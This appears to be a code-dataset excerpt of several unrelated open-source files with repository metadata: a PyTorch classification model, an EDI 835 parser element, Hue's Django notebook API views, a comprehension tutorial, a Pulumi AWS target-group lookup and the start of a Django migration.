if target < 0:
return 0
if dp[target] != -1:
return dp[target]
dp[target] = sum(dfs(target - num) for num in nums)
return dp[target]
return dfs(target)
| 22.866667
| 65
| 0.556851
|
4c64c84b4cd14435d519aaa5cc736e685ec2a153
| 3,237
|
py
|
Python
|
algorithms/ClassificationModel.py
|
ChenDarYen/FeatureLearningRotNet
|
5653d8c370fa1feded5d26156f452e83faad8287
|
[
"MIT"
] | null | null | null |
algorithms/ClassificationModel.py
|
ChenDarYen/FeatureLearningRotNet
|
5653d8c370fa1feded5d26156f452e83faad8287
|
[
"MIT"
] | null | null | null |
algorithms/ClassificationModel.py
|
ChenDarYen/FeatureLearningRotNet
|
5653d8c370fa1feded5d26156f452e83faad8287
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.optim
import os
import torchnet as tnt
import utils
import PIL
import pickle
from tqdm import tqdm
import time
from . import Algorithm
from pdb import set_trace as breakpoint
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k / batch_size)
return res
class ClassificationModel(Algorithm):
def __init__(self, opt):
Algorithm.__init__(self, opt)
def allocate_tensors(self):
self.tensors = {}
self.tensors['dataX'] = torch.FloatTensor()
self.tensors['labels'] = torch.LongTensor()
def train_step(self, batch):
return self.process_batch(batch, do_train=True)
def evaluation_step(self, batch):
return self.process_batch(batch, do_train=False)
def process_batch(self, batch, do_train=True):
#*************** LOAD BATCH (AND MOVE IT TO GPU) ********
start = time.time()
self.tensors['dataX'].resize_(batch[0].size()).copy_(batch[0])
self.tensors['labels'].resize_(batch[1].size()).copy_(batch[1])
dataX = self.tensors['dataX']
labels = self.tensors['labels']
batch_load_time = time.time() - start
#********************************************************
#********************************************************
start = time.time()
if do_train: # zero the gradients
self.optimizers['model'].zero_grad()
#********************************************************
#***************** SET TORCH VARIABLES ******************
dataX_var = torch.autograd.Variable(dataX, volatile=(not do_train))
labels_var = torch.autograd.Variable(labels, requires_grad=False)
#********************************************************
#************ FORWARD THROUGH NET ***********************
pred_var = self.networks['model'](dataX_var)
#********************************************************
#*************** COMPUTE LOSSES *************************
record = {}
loss_total = self.criterions['loss'](pred_var, labels_var)
record['prec1'] = accuracy(pred_var.data, labels, topk=(1,))[0].item()
record['loss'] = loss_total.data.item()
#********************************************************
#****** BACKPROPAGATE AND APPLY OPTIMIZATION STEP *******
if do_train:
loss_total.backward()
self.optimizers['model'].step()
#********************************************************
batch_process_time = time.time() - start
total_time = batch_process_time + batch_load_time
record['load_time'] = 100*(batch_load_time/total_time)
record['process_time'] = 100*(batch_process_time/total_time)
return record
| 34.806452
| 78
| 0.525795
|
6983eac9f52df8165d72ac2239636c4c6c7e1f84
| 315
|
py
|
Python
|
edi_835_parser/elements/service_modifier1.py
|
shalini1017/edi-835-parser
|
5c7c9549621a71cea893b37998e4bdea94822c5c
|
[
"MIT"
] | null | null | null |
edi_835_parser/elements/service_modifier1.py
|
shalini1017/edi-835-parser
|
5c7c9549621a71cea893b37998e4bdea94822c5c
|
[
"MIT"
] | null | null | null |
edi_835_parser/elements/service_modifier1.py
|
shalini1017/edi-835-parser
|
5c7c9549621a71cea893b37998e4bdea94822c5c
|
[
"MIT"
] | null | null | null |
from typing import Optional
from edi_835_parser.elements import Element
from edi_835_parser.elements.utilities import split_element
class ServiceModifier1(Element):
def parser(self, value: str) -> Optional[str]:
if value is not None:
value = split_element(value)
if len(value) > 2:
return value[2]
| 22.5
| 59
| 0.75873
|
73d58b8c794c4b1591d1846b3827ad2b0454e1b4
| 19,958
|
py
|
Python
|
desktop/libs/notebook/src/notebook/api.py
|
ShahabT/hue
|
88f5a64c118385e8f4ac413e2f8ea1fd06f14094
|
[
"Apache-2.0"
] | null | null | null |
desktop/libs/notebook/src/notebook/api.py
|
ShahabT/hue
|
88f5a64c118385e8f4ac413e2f8ea1fd06f14094
|
[
"Apache-2.0"
] | null | null | null |
desktop/libs/notebook/src/notebook/api.py
|
ShahabT/hue
|
88f5a64c118385e8f4ac413e2f8ea1fd06f14094
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
from django.core.urlresolvers import reverse
from django.forms import ValidationError
from django.http import HttpResponseBadRequest, HttpResponseRedirect
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_GET, require_POST
from desktop.lib.django_util import JsonResponse
from desktop.models import Document2, Document
from notebook.connectors.base import get_api, Notebook, QueryExpired, SessionExpired
from notebook.decorators import api_error_handler, check_document_access_permission, check_document_modify_permission
from notebook.github import GithubClient
from notebook.models import escape_rows
from notebook.views import upgrade_session_properties
LOG = logging.getLogger(__name__)
DEFAULT_HISTORY_NAME = ''
@require_POST
@api_error_handler
def create_notebook(request):
response = {'status': -1}
editor_type = request.POST.get('type', 'notebook')
directory_uuid = request.POST.get('directory_uuid')
editor = Notebook()
data = editor.get_data()
if editor_type != 'notebook':
data['name'] = ''
data['type'] = 'query-%s' % editor_type # TODO: Add handling for non-SQL types
data['directoryUuid'] = directory_uuid
editor.data = json.dumps(data)
response['notebook'] = editor.get_data()
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def create_session(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
session = json.loads(request.POST.get('session', '{}'))
properties = session.get('properties', [])
response['session'] = get_api(request, session).create_session(lang=session['type'], properties=properties)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def close_session(request):
response = {'status': -1}
session = json.loads(request.POST.get('session', '{}'))
response['session'] = get_api(request, {'type': session['type']}).close_session(session=session)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def execute(request):
response = {'status': -1}
result = None
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
try:
response['handle'] = get_api(request, snippet).execute(notebook, snippet)
# Retrieve and remove the result from the handle
if response['handle'].get('sync'):
result = response['handle'].pop('result')
finally:
if notebook['type'].startswith('query-'):
_snippet = [s for s in notebook['snippets'] if s['id'] == snippet['id']][0]
if 'handle' in response: # No failure
_snippet['result']['handle'] = response['handle']
_snippet['result']['statements_count'] = response['handle'].get('statements_count', 1)
_snippet['result']['statement_id'] = response['handle'].get('statement_id', 0)
_snippet['result']['handle']['statement'] = response['handle'].get('statement', snippet['statement']) # For non HS2, as non multi query yet
else:
_snippet['status'] = 'failed'
history = _historify(notebook, request.user)
response['history_id'] = history.id
response['history_uuid'] = history.uuid
if notebook['isSaved']: # Keep track of history of saved queries
response['history_parent_uuid'] = history.dependencies.filter(type__startswith='query-').latest('last_modified').uuid
# Inject and HTML escape results
if result is not None:
response['result'] = result
response['result']['data'] = escape_rows(result['data'])
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def check_status(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
if not snippet:
nb_doc = Document2.objects.get_by_uuid(user=request.user, uuid=notebook['id'])
notebook = Notebook(document=nb_doc).get_data()
snippet = notebook['snippets'][0]
try:
response['query_status'] = get_api(request, snippet).check_status(notebook, snippet)
response['status'] = 0
except SessionExpired:
response['status'] = 'expired'
raise
except QueryExpired:
response['status'] = 'expired'
raise
finally:
if response['status'] == 0 and snippet['status'] != response['query_status']:
status = response['query_status']['status']
elif response['status'] == 'expired':
status = 'expired'
else:
status = 'failed'
if notebook['type'].startswith('query'):
nb_doc = Document2.objects.get(id=notebook['id'])
nb_doc.can_write_or_exception(request.user)
nb = Notebook(document=nb_doc).get_data()
nb['snippets'][0]['status'] = status
nb_doc.update_data(nb)
nb_doc.save()
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def fetch_result_data(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
rows = json.loads(request.POST.get('rows', 100))
start_over = json.loads(request.POST.get('startOver', False))
response['result'] = get_api(request, snippet).fetch_result(notebook, snippet, rows, start_over)
# Materialize and HTML escape results
if response['result'].get('data') and response['result'].get('type') == 'table':
response['result']['data'] = escape_rows(response['result']['data'])
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def fetch_result_metadata(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
response['result'] = get_api(request, snippet).fetch_result_metadata(notebook, snippet)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def cancel_statement(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
response['result'] = get_api(request, snippet).cancel(notebook, snippet)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def get_logs(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
startFrom = request.POST.get('from')
startFrom = int(startFrom) if startFrom else None
size = request.POST.get('size')
size = int(size) if size else None
db = get_api(request, snippet)
logs = db.get_log(notebook, snippet, startFrom=startFrom, size=size)
jobs = json.loads(request.POST.get('jobs', '[]'))
# Get any new jobs from current logs snippet
new_jobs = db.get_jobs(notebook, snippet, logs)
# Append new jobs to known jobs and get the unique set
if new_jobs:
all_jobs = jobs + new_jobs
jobs = dict((job['name'], job) for job in all_jobs).values()
# Retrieve full log for job progress parsing
full_log = request.POST.get('full_log', logs)
response['logs'] = logs
response['progress'] = db.progress(snippet, full_log) if snippet['status'] != 'available' and snippet['status'] != 'success' else 100
response['jobs'] = jobs
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_modify_permission()
def save_notebook(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
notebook_type = notebook.get('type', 'notebook')
if notebook.get('parentSavedQueryUuid'): # We save into the original saved query, not into the query history
notebook_doc = Document2.objects.get_by_uuid(user=request.user, uuid=notebook['parentSavedQueryUuid'])
elif notebook.get('id'):
notebook_doc = Document2.objects.get(id=notebook['id'])
else:
notebook_doc = Document2.objects.create(name=notebook['name'], uuid=notebook['uuid'], type=notebook_type, owner=request.user)
Document.objects.link(notebook_doc, owner=notebook_doc.owner, name=notebook_doc.name, description=notebook_doc.description, extra=notebook_type)
if notebook.get('directoryUuid'):
notebook_doc.parent_directory = Document2.objects.get_by_uuid(user=request.user, uuid=notebook.get('directoryUuid'), perm_type='write')
else:
notebook_doc.parent_directory = Document2.objects.get_home_directory(request.user)
notebook['isSaved'] = True
notebook['isHistory'] = False
notebook['id'] = notebook_doc.id
notebook_doc1 = notebook_doc.doc.get()
notebook_doc.update_data(notebook)
notebook_doc.name = notebook_doc1.name = notebook['name']
notebook_doc.description = notebook_doc1.description = notebook['description']
notebook_doc.save()
notebook_doc1.save()
response['status'] = 0
response['id'] = notebook_doc.id
response['message'] = request.POST.get('editorMode') == 'true' and _('Query saved successfully') or _('Notebook saved successfully')
return JsonResponse(response)
def _historify(notebook, user):
query_type = notebook['type']
name = notebook['name'] if (notebook['name'] and notebook['name'].strip() != '') else DEFAULT_HISTORY_NAME
history_doc = Document2.objects.create(
name=name,
type=query_type,
owner=user,
is_history=True
)
# Link history of saved query
if notebook['isSaved']:
parent_doc = Document2.objects.get(uuid=notebook.get('parentSavedQueryUuid') or notebook['uuid']) # From previous history query or initial saved query
notebook['parentSavedQueryUuid'] = parent_doc.uuid
history_doc.dependencies.add(parent_doc)
Document.objects.link(
history_doc,
name=history_doc.name,
owner=history_doc.owner,
description=history_doc.description,
extra=query_type
)
notebook['uuid'] = history_doc.uuid
history_doc.update_data(notebook)
history_doc.save()
return history_doc
@require_GET
@api_error_handler
@check_document_access_permission()
def get_history(request):
response = {'status': -1}
doc_type = request.GET.get('doc_type')
limit = min(request.GET.get('len', 50), 100)
response['status'] = 0
history = []
for doc in Document2.objects.get_history(doc_type='query-%s' % doc_type, user=request.user).order_by('-last_modified')[:limit]:
notebook = Notebook(document=doc).get_data()
if 'snippets' in notebook:
try:
statement = notebook['snippets'][0]['result']['handle']['statement']
if type(statement) == dict: # Old format
statement = notebook['snippets'][0]['statement_raw']
except KeyError: # Old format
statement = notebook['snippets'][0]['statement_raw']
history.append({
'name': doc.name,
'id': doc.id,
'uuid': doc.uuid,
'type': doc.type,
'data': {
'statement': statement[:1001],
'lastExecuted': notebook['snippets'][0]['lastExecuted'],
'status': notebook['snippets'][0]['status'],
'parentSavedQueryUuid': notebook.get('parentSavedQueryUuid', '')
} if notebook['snippets'] else {},
'absoluteUrl': doc.get_absolute_url(),
})
else:
LOG.error('Incomplete History Notebook: %s' % notebook)
response['history'] = history
response['message'] = _('History fetched')
return JsonResponse(response)
@require_POST
@api_error_handler
@check_document_modify_permission()
def clear_history(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook'), '{}')
doc_type = request.POST.get('doc_type')
history = Document2.objects.get_history(doc_type='query-%s' % doc_type, user=request.user)
response['updated'] = history.delete()
response['message'] = _('History cleared !')
response['status'] = 0
return JsonResponse(response)
@require_GET
@check_document_access_permission()
def open_notebook(request):
response = {'status': -1}
notebook_id = request.GET.get('notebook')
notebook = Notebook(document=Document2.objects.get(id=notebook_id))
notebook = upgrade_session_properties(request, notebook)
response['status'] = 0
response['notebook'] = notebook.get_json()
response['message'] = _('Notebook loaded successfully')
@require_POST
@check_document_access_permission()
def close_notebook(request):
response = {'status': -1, 'result': []}
notebook = json.loads(request.POST.get('notebook', '{}'))
for session in [_s for _s in notebook['sessions'] if _s['type'] in ('scala', 'spark', 'pyspark', 'sparkr')]:
try:
response['result'].append(get_api(request, session).close_session(session))
except QueryExpired:
pass
except Exception, e:
LOG.exception('Error closing session %s' % str(e))
for snippet in [_s for _s in notebook['snippets'] if _s['type'] in ('hive', 'impala')]:
try:
response['result'] = get_api(request, snippet).close_statement(snippet)
except QueryExpired:
pass
except Exception, e:
LOG.exception('Error closing statement %s' % str(e))
response['status'] = 0
response['message'] = _('Notebook closed successfully')
return JsonResponse(response)
@require_POST
@check_document_access_permission()
def close_statement(request):
response = {'status': -1}
# Passed by check_document_access_permission but unused by APIs
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
try:
response['result'] = get_api(request, snippet).close_statement(snippet)
except QueryExpired:
pass
response['status'] = 0
response['message'] = _('Statement closed !')
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def autocomplete(request, server=None, database=None, table=None, column=None, nested=None):
response = {'status': -1}
# Passed by check_document_access_permission but unused by APIs
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
try:
autocomplete_data = get_api(request, snippet).autocomplete(snippet, database, table, column, nested)
response.update(autocomplete_data)
except QueryExpired:
pass
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def get_sample_data(request, server=None, database=None, table=None, column=None):
response = {'status': -1}
# Passed by check_document_access_permission but unused by APIs
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
sample_data = get_api(request, snippet).get_sample_data(snippet, database, table, column)
response.update(sample_data)
response['status'] = 0
return JsonResponse(response)
@require_POST
@check_document_access_permission()
@api_error_handler
def explain(request):
response = {'status': -1}
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
response = get_api(request, snippet).explain(notebook, snippet)
return JsonResponse(response)
@require_GET
@api_error_handler
def github_fetch(request):
response = {'status': -1}
api = GithubClient(access_token=request.session.get('github_access_token'))
response['url'] = url = request.GET.get('url')
if url:
owner, repo, branch, filepath = api.parse_github_url(url)
content = api.get_file_contents(owner, repo, filepath, branch)
try:
response['content'] = json.loads(content)
except ValueError:
# Content is not JSON-encoded so return plain-text
response['content'] = content
response['status'] = 0
else:
return HttpResponseBadRequest(_('url param is required'))
return JsonResponse(response)
@api_error_handler
def github_authorize(request):
access_token = request.session.get('github_access_token')
if access_token and GithubClient.is_authenticated(access_token):
response = {
'status': 0,
'message': _('User is already authenticated to GitHub.')
}
return JsonResponse(response)
else:
auth_url = GithubClient.get_authorization_url()
request.session['github_callback_redirect'] = request.GET.get('currentURL')
request.session['github_callback_fetch'] = request.GET.get('fetchURL')
response = {
'status': -1,
'auth_url':auth_url
}
if (request.is_ajax()):
return JsonResponse(response)
return HttpResponseRedirect(auth_url)
@api_error_handler
def github_callback(request):
redirect_base = request.session['github_callback_redirect'] + "&github_status="
if 'code' in request.GET:
session_code = request.GET.get('code')
request.session['github_access_token'] = GithubClient.get_access_token(session_code)
return HttpResponseRedirect(redirect_base + "0&github_fetch=" + request.session['github_callback_fetch'])
else:
return HttpResponseRedirect(redirect_base + "-1&github_fetch=" + request.session['github_callback_fetch'])
@require_POST
@check_document_access_permission()
@api_error_handler
def export_result(request):
response = {'status': -1, 'message': _('Exporting result failed.')}
# Passed by check_document_access_permission but unused by APIs
notebook = json.loads(request.POST.get('notebook', '{}'))
snippet = json.loads(request.POST.get('snippet', '{}'))
data_format = json.loads(request.POST.get('format', 'hdfs-file'))
destination = json.loads(request.POST.get('destination', ''))
overwrite = json.loads(request.POST.get('overwrite', False))
api = get_api(request, snippet)
if data_format == 'hdfs-file':
if overwrite and request.fs.exists(destination):
if request.fs.isfile(destination):
request.fs.do_as_user(request.user.username, request.fs.rmtree, destination)
else:
raise ValidationError(_("The target path is a directory"))
response['watch_url'] = api.export_data_as_hdfs_file(snippet, destination, overwrite)
response['status'] = 0
elif data_format == 'hive-table':
notebook_id = notebook['id'] or request.GET.get('editor', request.GET.get('notebook'))
response['watch_url'] = reverse('notebook:execute_and_watch') + '?action=save_as_table¬ebook=' + str(notebook_id) + '&snippet=0&destination=' + destination
response['status'] = 0
elif data_format == 'hdfs-directory':
notebook_id = notebook['id'] or request.GET.get('editor', request.GET.get('notebook'))
response['watch_url'] = reverse('notebook:execute_and_watch') + '?action=insert_as_query¬ebook=' + str(notebook_id) + '&snippet=0&destination=' + destination
response['status'] = 0
return JsonResponse(response)
| 32.771757
| 164
| 0.711194
|
242bfbe0a720164bbe3c5a651de7b96d08c2357d
| 585
|
py
|
Python
|
13_comprehension/comprehension_v5_dict.py
|
smartao/estudos_python
|
252a2e592ff929dfc6c06fc09b42cb7063ad0b5a
|
[
"MIT"
] | null | null | null |
13_comprehension/comprehension_v5_dict.py
|
smartao/estudos_python
|
252a2e592ff929dfc6c06fc09b42cb7063ad0b5a
|
[
"MIT"
] | 9
|
2019-11-15T14:21:43.000Z
|
2020-03-15T14:37:13.000Z
|
13_comprehension/comprehension_v5_dict.py
|
smartao/estudos_python
|
252a2e592ff929dfc6c06fc09b42cb7063ad0b5a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
'''
Dicionarios = trocar parenteses por chaves
i: é a chave do dicionario
i * 2 = É o valor da chave de i
'''
# Exemplo mais complexo
dicionario = {f'Item {i}': i * 2 for i in range(10) if i % 2 == 0}
print(dicionario)
# Exemplo mais simples
dicionario = {i: i * 2 for i in range(10) if i % 2 == 0}
print(dicionario)
for numero, dobro in dicionario.items():
print(f'{numero} x 2 = {dobro}')
# Fontes:
# Curso Python 3 - Curso Completo do Básico ao Avançado Udemy Aula 108 a 113
# https://github.com/cod3rcursos/curso-python/tree/master/list_comprehension
| 23.4
| 76
| 0.68547
|
c14d2ec4a222593239451ebb9f35b8e93ab003c6
| 10,463
|
py
|
Python
|
sdk/python/pulumi_aws/lb/get_target_group.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/lb/get_target_group.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/lb/get_target_group.py
|
alexbowers/pulumi-aws
|
7dbdb03b1e4f7c0d51d5b5d17233ff4465c3eff5
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetTargetGroupResult',
'AwaitableGetTargetGroupResult',
'get_target_group',
]
@pulumi.output_type
class GetTargetGroupResult:
"""
A collection of values returned by getTargetGroup.
"""
def __init__(__self__, arn=None, arn_suffix=None, deregistration_delay=None, health_check=None, id=None, lambda_multi_value_headers_enabled=None, load_balancing_algorithm_type=None, name=None, port=None, preserve_client_ip=None, protocol=None, protocol_version=None, proxy_protocol_v2=None, slow_start=None, stickiness=None, tags=None, target_type=None, vpc_id=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if arn_suffix and not isinstance(arn_suffix, str):
raise TypeError("Expected argument 'arn_suffix' to be a str")
pulumi.set(__self__, "arn_suffix", arn_suffix)
if deregistration_delay and not isinstance(deregistration_delay, int):
raise TypeError("Expected argument 'deregistration_delay' to be a int")
pulumi.set(__self__, "deregistration_delay", deregistration_delay)
if health_check and not isinstance(health_check, dict):
raise TypeError("Expected argument 'health_check' to be a dict")
pulumi.set(__self__, "health_check", health_check)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if lambda_multi_value_headers_enabled and not isinstance(lambda_multi_value_headers_enabled, bool):
raise TypeError("Expected argument 'lambda_multi_value_headers_enabled' to be a bool")
pulumi.set(__self__, "lambda_multi_value_headers_enabled", lambda_multi_value_headers_enabled)
if load_balancing_algorithm_type and not isinstance(load_balancing_algorithm_type, str):
raise TypeError("Expected argument 'load_balancing_algorithm_type' to be a str")
pulumi.set(__self__, "load_balancing_algorithm_type", load_balancing_algorithm_type)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if port and not isinstance(port, int):
raise TypeError("Expected argument 'port' to be a int")
pulumi.set(__self__, "port", port)
if preserve_client_ip and not isinstance(preserve_client_ip, str):
raise TypeError("Expected argument 'preserve_client_ip' to be a str")
pulumi.set(__self__, "preserve_client_ip", preserve_client_ip)
if protocol and not isinstance(protocol, str):
raise TypeError("Expected argument 'protocol' to be a str")
pulumi.set(__self__, "protocol", protocol)
if protocol_version and not isinstance(protocol_version, str):
raise TypeError("Expected argument 'protocol_version' to be a str")
pulumi.set(__self__, "protocol_version", protocol_version)
if proxy_protocol_v2 and not isinstance(proxy_protocol_v2, bool):
raise TypeError("Expected argument 'proxy_protocol_v2' to be a bool")
pulumi.set(__self__, "proxy_protocol_v2", proxy_protocol_v2)
if slow_start and not isinstance(slow_start, int):
raise TypeError("Expected argument 'slow_start' to be a int")
pulumi.set(__self__, "slow_start", slow_start)
if stickiness and not isinstance(stickiness, dict):
raise TypeError("Expected argument 'stickiness' to be a dict")
pulumi.set(__self__, "stickiness", stickiness)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if target_type and not isinstance(target_type, str):
raise TypeError("Expected argument 'target_type' to be a str")
pulumi.set(__self__, "target_type", target_type)
if vpc_id and not isinstance(vpc_id, str):
raise TypeError("Expected argument 'vpc_id' to be a str")
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter
def arn(self) -> str:
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="arnSuffix")
def arn_suffix(self) -> str:
return pulumi.get(self, "arn_suffix")
@property
@pulumi.getter(name="deregistrationDelay")
def deregistration_delay(self) -> int:
return pulumi.get(self, "deregistration_delay")
@property
@pulumi.getter(name="healthCheck")
def health_check(self) -> 'outputs.GetTargetGroupHealthCheckResult':
return pulumi.get(self, "health_check")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lambdaMultiValueHeadersEnabled")
def lambda_multi_value_headers_enabled(self) -> bool:
return pulumi.get(self, "lambda_multi_value_headers_enabled")
@property
@pulumi.getter(name="loadBalancingAlgorithmType")
def load_balancing_algorithm_type(self) -> str:
return pulumi.get(self, "load_balancing_algorithm_type")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def port(self) -> int:
return pulumi.get(self, "port")
@property
@pulumi.getter(name="preserveClientIp")
def preserve_client_ip(self) -> str:
return pulumi.get(self, "preserve_client_ip")
@property
@pulumi.getter
def protocol(self) -> str:
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="protocolVersion")
def protocol_version(self) -> str:
return pulumi.get(self, "protocol_version")
@property
@pulumi.getter(name="proxyProtocolV2")
def proxy_protocol_v2(self) -> bool:
return pulumi.get(self, "proxy_protocol_v2")
@property
@pulumi.getter(name="slowStart")
def slow_start(self) -> int:
return pulumi.get(self, "slow_start")
@property
@pulumi.getter
def stickiness(self) -> 'outputs.GetTargetGroupStickinessResult':
return pulumi.get(self, "stickiness")
@property
@pulumi.getter
def tags(self) -> Mapping[str, str]:
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="targetType")
def target_type(self) -> str:
return pulumi.get(self, "target_type")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> str:
return pulumi.get(self, "vpc_id")
class AwaitableGetTargetGroupResult(GetTargetGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetTargetGroupResult(
arn=self.arn,
arn_suffix=self.arn_suffix,
deregistration_delay=self.deregistration_delay,
health_check=self.health_check,
id=self.id,
lambda_multi_value_headers_enabled=self.lambda_multi_value_headers_enabled,
load_balancing_algorithm_type=self.load_balancing_algorithm_type,
name=self.name,
port=self.port,
preserve_client_ip=self.preserve_client_ip,
protocol=self.protocol,
protocol_version=self.protocol_version,
proxy_protocol_v2=self.proxy_protocol_v2,
slow_start=self.slow_start,
stickiness=self.stickiness,
tags=self.tags,
target_type=self.target_type,
vpc_id=self.vpc_id)
def get_target_group(arn: Optional[str] = None,
name: Optional[str] = None,
tags: Optional[Mapping[str, str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTargetGroupResult:
"""
> **Note:** `alb.TargetGroup` is known as `lb.TargetGroup`. The functionality is identical.
Provides information about a Load Balancer Target Group.
This data source can prove useful when a module accepts an LB Target Group as an
input variable and needs to know its attributes. It can also be used to get the ARN of
an LB Target Group for use in other resources, given LB Target Group name.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
config = pulumi.Config()
lb_tg_arn = config.get("lbTgArn")
if lb_tg_arn is None:
lb_tg_arn = ""
lb_tg_name = config.get("lbTgName")
if lb_tg_name is None:
lb_tg_name = ""
test = aws.lb.get_target_group(arn=lb_tg_arn,
name=lb_tg_name)
```
:param str arn: The full ARN of the target group.
:param str name: The unique name of the target group.
"""
__args__ = dict()
__args__['arn'] = arn
__args__['name'] = name
__args__['tags'] = tags
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:lb/getTargetGroup:getTargetGroup', __args__, opts=opts, typ=GetTargetGroupResult).value
return AwaitableGetTargetGroupResult(
arn=__ret__.arn,
arn_suffix=__ret__.arn_suffix,
deregistration_delay=__ret__.deregistration_delay,
health_check=__ret__.health_check,
id=__ret__.id,
lambda_multi_value_headers_enabled=__ret__.lambda_multi_value_headers_enabled,
load_balancing_algorithm_type=__ret__.load_balancing_algorithm_type,
name=__ret__.name,
port=__ret__.port,
preserve_client_ip=__ret__.preserve_client_ip,
protocol=__ret__.protocol,
protocol_version=__ret__.protocol_version,
proxy_protocol_v2=__ret__.proxy_protocol_v2,
slow_start=__ret__.slow_start,
stickiness=__ret__.stickiness,
tags=__ret__.tags,
target_type=__ret__.target_type,
vpc_id=__ret__.vpc_id)
| 39.935115
| 371
| 0.679442
|
33c3321195d1e5777731d673571e14e44bc85491
| 1,495
|
py
|
Python
|
app/migrations/0002_course_lesson.py
|
mehariogbe/teacher-vs-student
|
57a793bc73f297b03f024e8022c20bc5cbd4c46a
|
[
"MIT"
] | null | null | null |
app/migrations/0002_course_lesson.py
|
mehariogbe/teacher-vs-student
|
57a793bc73f297b03f024e8022c20bc5cbd4c46a
|
[
"MIT"
] | null | null | null |
app/migrations/0002_course_lesson.py
|
mehariogbe/teacher-vs-student
|
57a793bc73f297b03f024e8022c20bc5cbd4c46a
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-11-11 17:07
from django.db import migrations, models
import django.db.models.deletion
